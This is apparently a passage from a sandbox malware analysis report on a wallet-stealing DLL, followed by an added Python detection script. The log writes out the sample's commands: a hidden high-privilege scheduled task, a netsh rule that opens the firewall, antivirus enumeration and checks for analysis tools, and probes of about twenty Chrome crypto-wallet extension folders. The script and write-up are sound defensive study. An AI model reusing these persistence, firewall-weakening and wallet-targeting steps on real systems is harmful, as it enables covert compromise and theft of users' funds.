Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager!$
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerA"|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager!$|
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managerq"|
Source: ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager'X
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2697436058.000000000927B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: )Program Manager Chromexe)nWindowClass.0
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndStartU
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000005F76000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.0000000005FAA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32U
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Managerq"
Source: ybtrrus.exe, 0000001C.00000002.2691639077.000000000778E000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000775E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROGRAM MANAGERATIONAREAICONWINDOWCLASS.0
Source: ybtrrus.exe, 0000001C.00000002.2695219573.000000000941B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Managerration Wizard
Source: ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program ManagerQ!|
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager1#
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager1
Source: ybtrrus.exe, 0000001C.00000002.2691639077.00000000077EF000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.00000000077BF000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager@
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000005E66000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2657419183.0000000005FC5000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000060D5000.00000020.00000001.01000000.0000000D.sdmp Binary or memory string: Shell_TrayWndU
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C819920 cpuid 12_2_6C819920
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: GetLocaleInfoA, 28_2_6FE62D4C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 28_2_0545FCCC
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 28_2_0545FCCA
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_0545F12C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 28_2_0545F128
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: GetLocaleInfoW, 28_2_05467DC6
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: GetLocaleInfoW, 28_2_05467DBE
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: EnumSystemLocalesW, 28_2_05467C86
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp\0101a.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp\0101a_decrypted.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\iDQiPwFWUp VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh\0101a.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh\0101a_decrypted.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\pnVcakKiqh VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8555EE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_6C8555EE
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467ACE GetUserNameA, 28_2_05467ACE
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467EFE GetTimeZoneInformation, 28_2_05467EFE
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE6070D InitializeCriticalSectionAndSpinCount,GetVersion, 28_2_6FE6070D

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procmon.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: tcpview.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: Wireshark.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: procexp.exe
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000F25000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: LordPE.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: autoruns.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: ollydbg.exe
Source: ybtrrus.exe, ybtrrus.exe, 0000001C.00000002.2657419183.00000000058B6000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.00000000059C6000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.00000000055AA000.00000020.00000001.01000000.00000009.sdmp Binary or memory string: regmon.exe
Source: C:\iDQiPwFWUp\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\pnVcakKiqh\ybtrrus.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\iDQiPwFWUp\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeachknmefphepccionboohckonoeemg
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\pnVcakKiqh\ybtrrus.exe File queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C83C9A0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket, 12_2_6C83C9A0
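The three behaviours the report records above (the netsh firewall allow rule for ybtrrus.exe under "Lowering of HIPS / PFW / Operating System Security Settings", the root\SecurityCenter2 AntiVirusProduct WMI query, and the probing of Chrome wallet-extension directories under "Stealing of Sensitive Information") are each easy to turn into a host-telemetry rule. The script below is an added example written for this page; it is not code from Joe Sandbox or from the sample. It runs over constructed Sysmon-style event dictionaries (the `type`/`image`/`cmdline`/`query`/`path` schema is an assumption, as is the list of trusted program directories); the extension IDs are copied from the "File queried" lines above, and only the MetaMask and Phantom labels are my own mapping, the rest are left unlabelled. The rule that treats the browser itself as the only expected reader of its Extensions folder is a design choice, not something the report states.

```python
"""Triage rules for the behaviours listed in this report, run over constructed
Sysmon-style events. Added example; not the sandbox's or the sample's code."""
import re
from collections import defaultdict

# Wallet extension IDs copied from the report's "File queried" lines.
WALLET_EXTENSION_IDS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn", "hnfanknocfeofbddgcijnmhnfnkdnaad",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa", "lpfcbjknijpeeillifnkikgncikgfhdo",
    "kpfopkelmapcoipemfendmdcghnegimn", "aeachknmefphepccionboohckonoeemg",
    "jbdaocneiiinmjbjlgalhcelgbejmnid", "kncchdigobghenbbaddojjnnaogfppfj",
    "amkmjjmmflddogmhpjloimipbofnfjih", "nlbmnnijcnlegkjjpcfjclmcfggfefdm",
    "nanjmdknhkinifnkgdcggcfnhdaammmj", "ibnejdfjmmkpcnlpebklmnkoeoihofec",
    "fnjhmkhhmkbjkkabndcnnogagogbneec", "fhbohimaelbohpjbbldcngcnapndodjp",
    "afbcbjpbpfadlkmhmclhkeeodmamcflc", "cjelfplplebdjjenllpjcblmjkfcffne",
    "fihkakfobkmkjojpchpfgcmhfjnmnfpi", "ffnbelfdoeiohenkjibnmadjiehjhajb",
    "hpglfhgfnhbgpjdenjgmdgoeiappafln", "blnieiiffboillknjnepogjhkgnoapac",
}
# Labels I am confident of; the report itself does not name the extensions.
WALLET_LABELS = {"nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
                 "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom"}

# Assumption: programs under these roots are allowed to receive inbound rules.
TRUSTED_PROGRAM_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}   # expected readers of Extensions\

NETSH_ADD_RULE = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I)
NETSH_PROGRAM = re.compile(r'program="?([^"\s]+)', re.I)
# Chrome extension IDs are 32 characters drawn from a-p.
EXT_DIR = re.compile(r"\\Extensions\\([a-p]{32})(?:\\|$)", re.I)


def check_firewall_rule(cmdline):
    """Return the program path if cmdline adds an inbound allow rule for a
    program outside the trusted roots, else None."""
    if not NETSH_ADD_RULE.search(cmdline) or not re.search(r"action=allow", cmdline, re.I):
        return None
    m = NETSH_PROGRAM.search(cmdline)
    if not m:
        return None
    program = m.group(1).lower()
    return None if program.startswith(TRUSTED_PROGRAM_DIRS) else program


def check_av_query(query):
    """True for the SecurityCenter2 AntiVirusProduct enumeration seen in the report."""
    q = query.lower()
    return "securitycenter2" in q and "antivirusproduct" in q


def wallet_extension_hits(events):
    """Map non-browser process image -> [(extension_id, label)] for every
    wallet extension directory that process touched."""
    hits = defaultdict(list)
    for ev in events:
        if ev["type"] != "FileQuery":
            continue
        m = EXT_DIR.search(ev["path"])
        if not m or m.group(1).lower() not in WALLET_EXTENSION_IDS:
            continue
        if ev["image"].rsplit("\\", 1)[-1].lower() in BROWSERS:
            continue  # the browser reading its own profile is normal
        ext_id = m.group(1).lower()
        hits[ev["image"]].append((ext_id, WALLET_LABELS.get(ext_id)))
    return dict(hits)


def triage(events):
    """Run all three rules; return a list of (rule, image, detail) findings."""
    findings = []
    for ev in events:
        if ev["type"] == "ProcessCreate":
            prog = check_firewall_rule(ev["cmdline"])
            if prog:
                findings.append(("firewall_allow_untrusted_program", ev["image"], prog))
        elif ev["type"] == "WmiQuery" and check_av_query(ev["query"]):
            findings.append(("wmi_antivirus_enumeration", ev["image"], ev["query"]))
    for image, ids in wallet_extension_hits(events).items():
        findings.append(("wallet_extension_probe", image, f"{len(ids)} wallet extension dirs"))
    return findings


# Constructed events modelled on the report's lines (not real sandbox telemetry).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmdline": r'netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any'},
    {"type": "ProcessCreate", "image": "C:\\Windows\\System32\\cmd.exe",   # benign control
     "cmdline": r'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow program="C:\Windows\System32\svchost.exe"'},
    {"type": "WmiQuery", "image": "C:\\iDQiPwFWUp\\ybtrrus.exe",
     "query": r"IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct"},
    {"type": "FileQuery", "image": "C:\\iDQiPwFWUp\\ybtrrus.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn"},
    {"type": "FileQuery", "image": "C:\\iDQiPwFWUp\\ybtrrus.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\bfnaelmomeimhlpmgjnjophhpkkoljpa"},
    {"type": "FileQuery", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",  # benign control
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\manifest.json"},
]

if __name__ == "__main__":
    for rule, image, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:35} {image}  ->  {detail}")
```

On a live host the same firewall change can be confirmed and reverted with the tool the sample itself used: `netsh advfirewall firewall show rule name=ybtrrus` lists the rule (including the program path and profile), and `netsh advfirewall firewall delete rule name=ybtrrus` removes it. The wallet-extension rule deliberately keys on the process image rather than on any single extension ID, since the report shows the sample sweeping twenty directories in a row; a single non-browser process touching even one of them is already anomalous.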